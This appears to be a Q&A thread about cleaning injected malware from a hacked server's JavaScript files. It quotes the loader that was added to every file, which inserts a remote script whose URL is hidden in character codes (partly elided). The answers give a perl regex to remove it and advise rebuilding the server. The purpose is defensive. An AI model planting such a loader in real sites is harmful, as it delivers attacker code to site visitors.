# Replace (remove) multiple lines from files

Tags: sed, regular-expression, perl, malware

A server of mine was hacked, and they added at the beginning of every js file the following:

```
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,...,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
```

I need to clean them and I can't manually since they are thousands of files.

I'm struggling to find a working solution, I read about perl, and I wrote this:

```
perl -pi -e 's/var hglgfdrr4634hezfdg = 1; var d=document;var s=d\.createElement\(\x27script\x27\); s\.type=\x27text\/javascript\x27; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,...,106,115\); s\.src=pl;\nif \(document\.currentScript\) \{\ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else \{\nd\.getElementsByTagName\(\x27head\x27\)\[0\]\.appendChild\(s\);\n\}//' script.js
```

I tried on regex101 and the regex matches, the command gives no errors, but nothing is replaced...

Comment: I'd suggest reinstalling the system from scratch (possibly from a known good backup). You have an intruder in the system, and they may change those files in whatever way they want. The scripts are the least of your worries. See also [How do I deal with a compromised server?](//serverfault.com/q/218005)

Comment: Related https://unix.stackexchange.com/q/522623/117549

Answer (score 3, accepted):

`perl` will have to 'slurp' up the whole file in order to match `\n` character, so use the `-0777` option:

```
perl -i -0777pe 's/var hglgfdrr4634hezfdg = 1; var d=document;var s=d\.createElement\(\x27script\x27\); s\.type=\x27text\/javascript\x27; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,\.\.\.,106,115\); s\.src=pl;\nif \(document\.currentScript\) {\ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\(\x27head\x27\)\[0]\.appendChild\(s\);\n}\n//' script.js
```

Although with a hacked server there are likely more problems that need to be addressed.